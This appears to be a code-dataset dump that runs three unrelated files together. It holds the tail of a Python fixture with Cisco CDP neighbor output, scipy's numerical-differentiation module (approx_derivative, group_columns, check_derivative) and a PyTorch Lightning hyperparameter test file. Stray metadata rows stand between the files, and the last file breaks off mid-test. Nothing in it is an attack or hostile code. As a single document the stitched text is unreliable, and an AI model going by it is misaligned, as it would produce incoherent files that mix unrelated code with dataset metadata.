IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r4_show_cdp_neighbors = '''
R4>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/14
'''
r4_show_cdp_neighbors_detail = '''
R4>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r5_show_cdp_neighbors = '''
R5>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/15
'''
r5_show_cdp_neighbors_detail = '''
R5>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
| 2.09375 | 2 |
scipy/optimize/_numdiff.py | jeremiedbb/scipy | 1 | 1265 | """Routines for numerical differentiation."""
from __future__ import division
import numpy as np
from numpy.linalg import norm
from scipy.sparse.linalg import LinearOperator
from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find
from ._group_columns import group_dense, group_sparse
EPS = np.finfo(np.float64).eps
def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub):
"""Adjust final difference scheme to the presence of bounds.
Parameters
----------
x0 : ndarray, shape (n,)
Point at which we wish to estimate derivative.
h : ndarray, shape (n,)
Desired finite difference steps.
num_steps : int
Number of `h` steps in one direction required to implement finite
difference scheme. For example, 2 means that we need to evaluate
f(x0 + 2 * h) or f(x0 - 2 * h)
scheme : {'1-sided', '2-sided'}
Whether steps in one or both directions are required. In other
words '1-sided' applies to forward and backward schemes, '2-sided'
applies to center schemes.
lb : ndarray, shape (n,)
Lower bounds on independent variables.
ub : ndarray, shape (n,)
Upper bounds on independent variables.
Returns
-------
h_adjusted : ndarray, shape (n,)
        Adjusted step sizes. A step size decreases only if a sign flip or
        switching to the one-sided scheme does not allow taking a full step.
use_one_sided : ndarray of bool, shape (n,)
Whether to switch to one-sided scheme. Informative only for
``scheme='2-sided'``.
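
    Examples
    --------
    A minimal illustration (the arrays here are arbitrary); with unbounded
    variables the requested steps come back unchanged:

    >>> import numpy as np
    >>> h_adj, one_sided = _adjust_scheme_to_bounds(
    ...     np.array([1.0]), np.array([1e-8]), 1, '1-sided',
    ...     np.array([-np.inf]), np.array([np.inf]))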
"""
if scheme == '1-sided':
use_one_sided = np.ones_like(h, dtype=bool)
elif scheme == '2-sided':
h = np.abs(h)
use_one_sided = np.zeros_like(h, dtype=bool)
else:
raise ValueError("`scheme` must be '1-sided' or '2-sided'.")
if np.all((lb == -np.inf) & (ub == np.inf)):
return h, use_one_sided
h_total = h * num_steps
h_adjusted = h.copy()
lower_dist = x0 - lb
upper_dist = ub - x0
if scheme == '1-sided':
x = x0 + h_total
violated = (x < lb) | (x > ub)
fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist)
h_adjusted[violated & fitting] *= -1
forward = (upper_dist >= lower_dist) & ~fitting
h_adjusted[forward] = upper_dist[forward] / num_steps
backward = (upper_dist < lower_dist) & ~fitting
h_adjusted[backward] = -lower_dist[backward] / num_steps
elif scheme == '2-sided':
central = (lower_dist >= h_total) & (upper_dist >= h_total)
forward = (upper_dist >= lower_dist) & ~central
h_adjusted[forward] = np.minimum(
h[forward], 0.5 * upper_dist[forward] / num_steps)
use_one_sided[forward] = True
backward = (upper_dist < lower_dist) & ~central
h_adjusted[backward] = -np.minimum(
h[backward], 0.5 * lower_dist[backward] / num_steps)
use_one_sided[backward] = True
min_dist = np.minimum(upper_dist, lower_dist) / num_steps
adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist))
h_adjusted[adjusted_central] = min_dist[adjusted_central]
use_one_sided[adjusted_central] = False
return h_adjusted, use_one_sided
relative_step = {"2-point": EPS**0.5,
"3-point": EPS**(1/3),
"cs": EPS**0.5}
def _compute_absolute_step(rel_step, x0, method):
if rel_step is None:
rel_step = relative_step[method]
sign_x0 = (x0 >= 0).astype(float) * 2 - 1
return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0))
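# For example (illustrative only): with the default '2-point' relative step,
# rel_step = EPS**0.5 ~ 1.5e-8, so for x0 = -2.0 the absolute step becomes
# h = 1.5e-8 * (-1) * max(1.0, 2.0) ~ -3.0e-8.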
def _prepare_bounds(bounds, x0):
lb, ub = [np.asarray(b, dtype=float) for b in bounds]
if lb.ndim == 0:
lb = np.resize(lb, x0.shape)
if ub.ndim == 0:
ub = np.resize(ub, x0.shape)
return lb, ub
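# For example, _prepare_bounds((0, 1), x0) with x0 of shape (3,) broadcasts the
# scalar bounds to lb = [0., 0., 0.] and ub = [1., 1., 1.].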
def group_columns(A, order=0):
"""Group columns of a 2-D matrix for sparse finite differencing [1]_.
Two columns are in the same group if in each row at least one of them
has zero. A greedy sequential algorithm is used to construct groups.
Parameters
----------
A : array_like or sparse matrix, shape (m, n)
Matrix of which to group columns.
order : int, iterable of int with shape (n,) or None
Permutation array which defines the order of columns enumeration.
        If int or None, a random permutation is used with `order` used as
        a random seed. Default is 0, that is, a random permutation is used
        but repeatability is guaranteed.
Returns
-------
groups : ndarray of int, shape (n,)
Contains values from 0 to n_groups-1, where n_groups is the number
        of found groups. Each value ``groups[i]`` is the index of the group
        to which the ith column is assigned. The procedure is helpful only
        if n_groups is significantly smaller than n.
References
----------
.. [1] <NAME>, <NAME>, and <NAME>, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13 (1974), pp. 117-120.
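
    Examples
    --------
    A sketch of the intended use (the exact grouping returned depends on the
    greedy pass and on `order`, so only the shape is asserted here):

    >>> import numpy as np
    >>> structure = np.array([[1, 1, 0, 0],
    ...                       [0, 1, 1, 0],
    ...                       [0, 0, 1, 1]])
    >>> groups = group_columns(structure, order=[0, 1, 2, 3])
    >>> groups.shape
    (4,)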
"""
if issparse(A):
A = csc_matrix(A)
else:
A = np.atleast_2d(A)
A = (A != 0).astype(np.int32)
if A.ndim != 2:
raise ValueError("`A` must be 2-dimensional.")
m, n = A.shape
if order is None or np.isscalar(order):
rng = np.random.RandomState(order)
order = rng.permutation(n)
else:
order = np.asarray(order)
if order.shape != (n,):
raise ValueError("`order` has incorrect shape.")
A = A[:, order]
if issparse(A):
groups = group_sparse(m, n, A.indices, A.indptr)
else:
groups = group_dense(m, n, A)
groups[order] = groups.copy()
return groups
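# Minimal usage sketch (hypothetical helper, not part of the original module):
# grouping the columns of a tridiagonal sparsity pattern. For a banded structure
# only a handful of groups are needed regardless of n, which is what makes sparse
# finite differencing economical.
def _demo_group_columns(n=6):  # pragma: no cover
    A = np.eye(n) + np.eye(n, k=1) + np.eye(n, k=-1)  # tridiagonal pattern
    groups = group_columns(A)
    return groups  # typically 3 distinct group labels, independent of n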
def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,
bounds=(-np.inf, np.inf), sparsity=None,
as_linear_operator=False, args=(), kwargs={}):
"""Compute finite difference approximation of the derivatives of a
vector-valued function.
If a function maps from R^n to R^m, its derivatives form m-by-n matrix
called the Jacobian, where an element (i, j) is a partial derivative of
f[i] with respect to x[j].
Parameters
----------
fun : callable
Function of which to estimate the derivatives. The argument x
passed to this function is ndarray of shape (n,) (never a scalar
even if n=1). It must return 1-D array_like of shape (m,) or a scalar.
x0 : array_like of shape (n,) or float
Point at which to estimate the derivatives. Float will be converted
to a 1-D array.
method : {'3-point', '2-point', 'cs'}, optional
Finite difference method to use:
- '2-point' - use the first order accuracy forward or backward
difference.
- '3-point' - use central difference in interior points and the
second order accuracy forward or backward difference
near the boundary.
- 'cs' - use a complex-step finite difference scheme. This assumes
that the user function is real-valued and can be
analytically continued to the complex plane. Otherwise,
produces bogus results.
rel_step : None or array_like, optional
Relative step size to use. The absolute step size is computed as
``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to
fit into the bounds. For ``method='3-point'`` the sign of `h` is
ignored. If None (default) then step is selected automatically,
see Notes.
f0 : None or array_like, optional
If not None it is assumed to be equal to ``fun(x0)``, in this case
the ``fun(x0)`` is not called. Default is None.
bounds : tuple of array_like, optional
Lower and upper bounds on independent variables. Defaults to no bounds.
Each bound must match the size of `x0` or be a scalar, in the latter
case the bound will be the same for all variables. Use it to limit the
range of function evaluation. Bounds checking is not implemented
when `as_linear_operator` is True.
sparsity : {None, array_like, sparse matrix, 2-tuple}, optional
Defines a sparsity structure of the Jacobian matrix. If the Jacobian
matrix is known to have only few non-zero elements in each row, then
it's possible to estimate its several columns by a single function
evaluation [3]_. To perform such economic computations two ingredients
are required:
* structure : array_like or sparse matrix of shape (m, n). A zero
element means that a corresponding element of the Jacobian
identically equals to zero.
* groups : array_like of shape (n,). A column grouping for a given
sparsity structure, use `group_columns` to obtain it.
A single array or a sparse matrix is interpreted as a sparsity
structure, and groups are computed inside the function. A tuple is
interpreted as (structure, groups). If None (default), a standard
dense differencing will be used.
Note, that sparse differencing makes sense only for large Jacobian
matrices where each row contains few non-zero elements.
as_linear_operator : bool, optional
When True the function returns an `scipy.sparse.linalg.LinearOperator`.
Otherwise it returns a dense array or a sparse matrix depending on
`sparsity`. The linear operator provides an efficient way of computing
``J.dot(p)`` for any vector ``p`` of shape (n,), but does not allow
direct access to individual elements of the matrix. By default
`as_linear_operator` is False.
args, kwargs : tuple and dict, optional
Additional arguments passed to `fun`. Both empty by default.
The calling signature is ``fun(x, *args, **kwargs)``.
Returns
-------
J : {ndarray, sparse matrix, LinearOperator}
Finite difference approximation of the Jacobian matrix.
If `as_linear_operator` is True returns a LinearOperator
with shape (m, n). Otherwise it returns a dense array or sparse
matrix depending on how `sparsity` is defined. If `sparsity`
is None then a ndarray with shape (m, n) is returned. If
`sparsity` is not None returns a csr_matrix with shape (m, n).
For sparse matrices and linear operators it is always returned as
        a 2-D structure; for ndarrays, if m=1 it is returned
as a 1-D gradient array with shape (n,).
See Also
--------
check_derivative : Check correctness of a function computing derivatives.
Notes
-----
    If `rel_step` is not provided, it is assigned to ``EPS**(1/s)``, where EPS is
machine epsilon for float64 numbers, s=2 for '2-point' method and s=3 for
'3-point' method. Such relative step approximately minimizes a sum of
truncation and round-off errors, see [1]_.
A finite difference scheme for '3-point' method is selected automatically.
The well-known central difference scheme is used for points sufficiently
far from the boundary, and 3-point forward or backward scheme is used for
points near the boundary. Both schemes have the second-order accuracy in
terms of Taylor expansion. Refer to [2]_ for the formulas of 3-point
forward and backward difference schemes.
    For dense differencing, when m=1 the Jacobian is returned with shape (n,);
    on the other hand, when n=1 the Jacobian is returned with shape (m, 1).
    Our motivation is the following: a) it handles the case of gradient
    computation (m=1) in a conventional way; b) it clearly separates these two
    different cases; c) in all cases np.atleast_2d can be called to get a 2-D
    Jacobian with correct dimensions.
References
----------
    .. [1] W. H. Press et al. "Numerical Recipes. The Art of Scientific
Computing. 3rd edition", sec. 5.7.
.. [2] <NAME>, <NAME>, and <NAME>, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13 (1974), pp. 117-120.
.. [3] <NAME>, "Generation of Finite Difference Formulas on
Arbitrarily Spaced Grids", Mathematics of Computation 51, 1988.
Examples
--------
>>> import numpy as np
>>> from scipy.optimize import approx_derivative
>>>
>>> def f(x, c1, c2):
... return np.array([x[0] * np.sin(c1 * x[1]),
... x[0] * np.cos(c2 * x[1])])
...
>>> x0 = np.array([1.0, 0.5 * np.pi])
>>> approx_derivative(f, x0, args=(1, 2))
array([[ 1., 0.],
[-1., 0.]])
Bounds can be used to limit the region of function evaluation.
In the example below we compute left and right derivative at point 1.0.
>>> def g(x):
... return x**2 if x >= 1 else x
...
>>> x0 = 1.0
>>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))
array([ 1.])
>>> approx_derivative(g, x0, bounds=(1.0, np.inf))
array([ 2.])
"""
if method not in ['2-point', '3-point', 'cs']:
raise ValueError("Unknown method '%s'. " % method)
x0 = np.atleast_1d(x0)
if x0.ndim > 1:
raise ValueError("`x0` must have at most 1 dimension.")
lb, ub = _prepare_bounds(bounds, x0)
if lb.shape != x0.shape or ub.shape != x0.shape:
raise ValueError("Inconsistent shapes between bounds and `x0`.")
if as_linear_operator and not (np.all(np.isinf(lb))
and np.all(np.isinf(ub))):
raise ValueError("Bounds not supported when "
"`as_linear_operator` is True.")
def fun_wrapped(x):
f = np.atleast_1d(fun(x, *args, **kwargs))
if f.ndim > 1:
raise RuntimeError("`fun` return value has "
"more than 1 dimension.")
return f
if f0 is None:
f0 = fun_wrapped(x0)
else:
f0 = np.atleast_1d(f0)
if f0.ndim > 1:
raise ValueError("`f0` passed has more than 1 dimension.")
if np.any((x0 < lb) | (x0 > ub)):
raise ValueError("`x0` violates bound constraints.")
if as_linear_operator:
if rel_step is None:
rel_step = relative_step[method]
return _linear_operator_difference(fun_wrapped, x0,
f0, rel_step, method)
else:
h = _compute_absolute_step(rel_step, x0, method)
if method == '2-point':
h, use_one_sided = _adjust_scheme_to_bounds(
x0, h, 1, '1-sided', lb, ub)
elif method == '3-point':
h, use_one_sided = _adjust_scheme_to_bounds(
x0, h, 1, '2-sided', lb, ub)
elif method == 'cs':
use_one_sided = False
if sparsity is None:
return _dense_difference(fun_wrapped, x0, f0, h,
use_one_sided, method)
else:
if not issparse(sparsity) and len(sparsity) == 2:
structure, groups = sparsity
else:
structure = sparsity
groups = group_columns(sparsity)
if issparse(structure):
structure = csc_matrix(structure)
else:
structure = np.atleast_2d(structure)
groups = np.atleast_1d(groups)
return _sparse_difference(fun_wrapped, x0, f0, h,
use_one_sided, structure,
groups, method)
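# Illustrative sketch (added, not part of the original module): estimating a banded
# Jacobian with sparse differencing. The function below is hypothetical and only
# shows how `sparsity` and `group_columns` fit together.
def _demo_sparse_jacobian(n=8):  # pragma: no cover
    structure = np.eye(n) + np.eye(n, k=1)  # upper bidiagonal sparsity pattern
    groups = group_columns(structure)  # 2 groups suffice for this pattern
    def fun(x):
        f = x ** 2
        f[:-1] += 3.0 * x[1:]  # each f[i] depends only on x[i] and x[i + 1]
        return f
    x0 = np.arange(1.0, n + 1.0)
    # Sparse differencing needs only a few function evaluations per group instead
    # of a pair per variable, and returns a csr_matrix of shape (n, n).
    return approx_derivative(fun, x0, sparsity=(structure, groups))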
def _linear_operator_difference(fun, x0, f0, h, method):
m = f0.size
n = x0.size
if method == '2-point':
def matvec(p):
if np.array_equal(p, np.zeros_like(p)):
return np.zeros(m)
dx = h / norm(p)
x = x0 + dx*p
df = fun(x) - f0
return df / dx
elif method == '3-point':
def matvec(p):
if np.array_equal(p, np.zeros_like(p)):
return np.zeros(m)
dx = 2*h / norm(p)
x1 = x0 - (dx/2)*p
x2 = x0 + (dx/2)*p
f1 = fun(x1)
f2 = fun(x2)
df = f2 - f1
return df / dx
elif method == 'cs':
def matvec(p):
if np.array_equal(p, np.zeros_like(p)):
return np.zeros(m)
dx = h / norm(p)
x = x0 + dx*p*1.j
f1 = fun(x)
df = f1.imag
return df / dx
else:
raise RuntimeError("Never be here.")
return LinearOperator((m, n), matvec)
def _dense_difference(fun, x0, f0, h, use_one_sided, method):
m = f0.size
n = x0.size
J_transposed = np.empty((n, m))
h_vecs = np.diag(h)
for i in range(h.size):
if method == '2-point':
x = x0 + h_vecs[i]
dx = x[i] - x0[i] # Recompute dx as exactly representable number.
df = fun(x) - f0
elif method == '3-point' and use_one_sided[i]:
x1 = x0 + h_vecs[i]
x2 = x0 + 2 * h_vecs[i]
dx = x2[i] - x0[i]
f1 = fun(x1)
f2 = fun(x2)
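            # Second-order one-sided difference: df / dx below evaluates
            # (-3*f(x0) + 4*f(x0+h) - f(x0+2h)) / (2h), since dx = 2h here.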
df = -3.0 * f0 + 4 * f1 - f2
elif method == '3-point' and not use_one_sided[i]:
x1 = x0 - h_vecs[i]
x2 = x0 + h_vecs[i]
dx = x2[i] - x1[i]
f1 = fun(x1)
f2 = fun(x2)
df = f2 - f1
elif method == 'cs':
f1 = fun(x0 + h_vecs[i]*1.j)
df = f1.imag
dx = h_vecs[i, i]
else:
raise RuntimeError("Never be here.")
J_transposed[i] = df / dx
if m == 1:
J_transposed = np.ravel(J_transposed)
return J_transposed.T
def _sparse_difference(fun, x0, f0, h, use_one_sided,
structure, groups, method):
m = f0.size
n = x0.size
row_indices = []
col_indices = []
fractions = []
n_groups = np.max(groups) + 1
for group in range(n_groups):
# Perturb variables which are in the same group simultaneously.
e = np.equal(group, groups)
h_vec = h * e
if method == '2-point':
x = x0 + h_vec
dx = x - x0
df = fun(x) - f0
# The result is written to columns which correspond to perturbed
# variables.
cols, = np.nonzero(e)
# Find all non-zero elements in selected columns of Jacobian.
i, j, _ = find(structure[:, cols])
# Restore column indices in the full array.
j = cols[j]
elif method == '3-point':
# Here we do conceptually the same but separate one-sided
# and two-sided schemes.
x1 = x0.copy()
x2 = x0.copy()
mask_1 = use_one_sided & e
x1[mask_1] += h_vec[mask_1]
x2[mask_1] += 2 * h_vec[mask_1]
mask_2 = ~use_one_sided & e
x1[mask_2] -= h_vec[mask_2]
x2[mask_2] += h_vec[mask_2]
dx = np.zeros(n)
dx[mask_1] = x2[mask_1] - x0[mask_1]
dx[mask_2] = x2[mask_2] - x1[mask_2]
f1 = fun(x1)
f2 = fun(x2)
cols, = np.nonzero(e)
i, j, _ = find(structure[:, cols])
j = cols[j]
mask = use_one_sided[j]
df = np.empty(m)
rows = i[mask]
df[rows] = -3 * f0[rows] + 4 * f1[rows] - f2[rows]
rows = i[~mask]
df[rows] = f2[rows] - f1[rows]
elif method == 'cs':
f1 = fun(x0 + h_vec*1.j)
df = f1.imag
dx = h_vec
cols, = np.nonzero(e)
i, j, _ = find(structure[:, cols])
j = cols[j]
else:
raise ValueError("Never be here.")
# All that's left is to compute the fraction. We store i, j and
# fractions as separate arrays and later construct coo_matrix.
row_indices.append(i)
col_indices.append(j)
fractions.append(df[i] / dx[j])
row_indices = np.hstack(row_indices)
col_indices = np.hstack(col_indices)
fractions = np.hstack(fractions)
J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n))
return csr_matrix(J)
def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(),
kwargs={}):
"""Check correctness of a function computing derivatives (Jacobian or
gradient) by comparison with a finite difference approximation.
Parameters
----------
fun : callable
Function of which to estimate the derivatives. The argument x
passed to this function is ndarray of shape (n,) (never a scalar
even if n=1). It must return 1-D array_like of shape (m,) or a scalar.
jac : callable
Function which computes Jacobian matrix of `fun`. It must work with
argument x the same way as `fun`. The return value must be array_like
or sparse matrix with an appropriate shape.
x0 : array_like of shape (n,) or float
Point at which to estimate the derivatives. Float will be converted
to 1-D array.
bounds : 2-tuple of array_like, optional
Lower and upper bounds on independent variables. Defaults to no bounds.
Each bound must match the size of `x0` or be a scalar, in the latter
case the bound will be the same for all variables. Use it to limit the
range of function evaluation.
args, kwargs : tuple and dict, optional
Additional arguments passed to `fun` and `jac`. Both empty by default.
The calling signature is ``fun(x, *args, **kwargs)`` and the same
for `jac`.
Returns
-------
accuracy : float
The maximum among all relative errors for elements with absolute values
higher than 1 and absolute errors for elements with absolute values
less or equal than 1. If `accuracy` is on the order of 1e-6 or lower,
then it is likely that your `jac` implementation is correct.
See Also
--------
approx_derivative : Compute finite difference approximation of derivative.
Examples
--------
>>> import numpy as np
>>> from scipy.optimize import check_derivative
>>>
>>>
>>> def f(x, c1, c2):
... return np.array([x[0] * np.sin(c1 * x[1]),
... x[0] * np.cos(c2 * x[1])])
...
>>> def jac(x, c1, c2):
... return np.array([
... [np.sin(c1 * x[1]), c1 * x[0] * np.cos(c1 * x[1])],
... [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2 * x[1])]
... ])
...
>>>
>>> x0 = np.array([1.0, 0.5 * np.pi])
>>> check_derivative(f, jac, x0, args=(1, 2))
2.4492935982947064e-16
"""
J_to_test = jac(x0, *args, **kwargs)
if issparse(J_to_test):
J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test,
args=args, kwargs=kwargs)
J_to_test = csr_matrix(J_to_test)
abs_err = J_to_test - J_diff
i, j, abs_err_data = find(abs_err)
J_diff_data = np.asarray(J_diff[i, j]).ravel()
return np.max(np.abs(abs_err_data) /
np.maximum(1, np.abs(J_diff_data)))
else:
J_diff = approx_derivative(fun, x0, bounds=bounds,
args=args, kwargs=kwargs)
abs_err = np.abs(J_to_test - J_diff)
return np.max(abs_err / np.maximum(1, np.abs(J_diff)))
| 2.890625 | 3 |
tests/models/test_hparams.py | abhinavg97/pytorch-lightning | 1 | 1266 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
from argparse import Namespace
import cloudpickle
import pytest
import torch
from fsspec.implementations.local import LocalFileSystem
from omegaconf import OmegaConf, Container
from torch.nn import functional as F
from torch.utils.data import DataLoader
from pytorch_lightning import Trainer, LightningModule
from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml
from pytorch_lightning.utilities import AttributeDict, is_picklable
from tests.base import EvalModelTemplate, TrialMNIST, BoringModel
class SaveHparamsModel(EvalModelTemplate):
""" Tests that a model can take an object """
def __init__(self, hparams):
super().__init__()
self.save_hyperparameters(hparams)
class AssignHparamsModel(EvalModelTemplate):
""" Tests that a model can take an object with explicit setter """
def __init__(self, hparams):
super().__init__()
self.hparams = hparams
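# Added commentary (not part of the original test suite): the two classes above
# exercise the two supported ways of populating ``self.hparams`` -- recording the
# arguments via ``self.save_hyperparameters(hparams)`` versus assigning
# ``self.hparams = hparams`` directly. The tests below expect both variants to
# round-trip through checkpoint saving and ``load_from_checkpoint``.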
# -------------------------
# STANDARD TESTS
# -------------------------
def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False):
"""
Tests for the existence of an arg 'test_arg=14'
"""
hparam_type = type(model.hparams)
# test proper property assignments
assert model.hparams.test_arg == 14
# verify we can train
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2)
trainer.fit(model)
# make sure the raw checkpoint saved the properties
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14
# verify that model loads correctly
model2 = cls.load_from_checkpoint(raw_checkpoint_path)
assert model2.hparams.test_arg == 14
assert isinstance(model2.hparams, hparam_type)
if try_overwrite:
# verify that we can overwrite the property
model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78)
assert model3.hparams.test_arg == 78
return raw_checkpoint_path
@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_namespace_hparams(tmpdir, cls):
# init model
model = cls(hparams=Namespace(test_arg=14))
# run standard test suite
_run_standard_hparams_test(tmpdir, model, cls)
@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_dict_hparams(tmpdir, cls):
# init model
model = cls(hparams={'test_arg': 14})
# run standard test suite
_run_standard_hparams_test(tmpdir, model, cls)
@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_omega_conf_hparams(tmpdir, cls):
# init model
conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)]))
model = cls(hparams=conf)
assert isinstance(model.hparams, Container)
# run standard test suite
raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls)
model2 = cls.load_from_checkpoint(raw_checkpoint_path)
assert isinstance(model2.hparams, Container)
# config specific tests
assert model2.hparams.test_arg == 14
assert model2.hparams.mylist[0] == 15.4
def test_explicit_args_hparams(tmpdir):
"""
    Tests that a model can take explicitly named args and save them as hparams
"""
# define model
class LocalModel(EvalModelTemplate):
def __init__(self, test_arg, test_arg2):
super().__init__()
self.save_hyperparameters('test_arg', 'test_arg2')
model = LocalModel(test_arg=14, test_arg2=90)
# run standard test suite
raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel)
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120)
# config specific tests
assert model.hparams.test_arg2 == 120
def test_implicit_args_hparams(tmpdir):
"""
Tests that a model can take regular args and assign
"""
# define model
class LocalModel(EvalModelTemplate):
def __init__(self, test_arg, test_arg2):
super().__init__()
self.save_hyperparameters()
model = LocalModel(test_arg=14, test_arg2=90)
# run standard test suite
raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel)
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120)
# config specific tests
assert model.hparams.test_arg2 == 120
def test_explicit_missing_args_hparams(tmpdir):
"""
    Tests that only the explicitly listed args are saved as hparams
"""
# define model
class LocalModel(EvalModelTemplate):
def __init__(self, test_arg, test_arg2):
super().__init__()
self.save_hyperparameters('test_arg')
model = LocalModel(test_arg=14, test_arg2=90)
# test proper property assignments
assert model.hparams.test_arg == 14
# verify we can train
trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
trainer.fit(model)
# make sure the raw checkpoint saved the properties
raw_checkpoint_path = _raw_checkpoint_path(trainer)
raw_checkpoint = torch.load(raw_checkpoint_path)
assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14
# verify that model loads correctly
model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123)
assert model.hparams.test_arg == 14
assert 'test_arg2' not in model.hparams # test_arg2 is not registered in class init
return raw_checkpoint_path
# -------------------------
# SPECIFIC TESTS
# -------------------------
def test_class_nesting():
class MyModule(LightningModule):
def forward(self):
...
# make sure PL modules are always nn.Module
a = MyModule()
assert isinstance(a, torch.nn.Module)
def test_outside():
a = MyModule()
_ = a.hparams
class A:
def test(self):
a = MyModule()
_ = a.hparams
def test2(self):
test_outside()
test_outside()
A().test2()
A().test()
class SubClassEvalModel(EvalModelTemplate):
any_other_loss = torch.nn.CrossEntropyLoss()
def __init__(self, *args, subclass_arg=1200, **kwargs):
super().__init__(*args, **kwargs)
self.save_hyperparameters()
class SubSubClassEvalModel(SubClassEvalModel):
pass
class AggSubClassEvalModel(SubClassEvalModel):
def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs):
super().__init__(*args, **kwargs)
self.save_hyperparameters()
class UnconventionalArgsEvalModel(EvalModelTemplate):
""" A model that has unconventional names for "self", "*args" and "**kwargs". """
def __init__(obj, *more_args, other_arg=300, **more_kwargs):
# intentionally named obj
super().__init__(*more_args, **more_kwargs)
obj.save_hyperparameters()
class DictConfSubClassEvalModel(SubClassEvalModel):
def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs):
super().__init__(*args, **kwargs)
self.save_hyperparameters()
@pytest.mark.parametrize("cls", [
EvalModelTemplate,
SubClassEvalModel,
SubSubClassEvalModel,
AggSubClassEvalModel,
UnconventionalArgsEvalModel,
DictConfSubClassEvalModel,
])
def test_collect_init_arguments(tmpdir, cls):
""" Test that the model automatically saves the arguments passed into the constructor """
extra_args = {}
if cls is AggSubClassEvalModel:
extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss())
elif cls is DictConfSubClassEvalModel:
extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything')))
model = cls(**extra_args)
assert model.hparams.batch_size == 32
model = cls(batch_size=179, **extra_args)
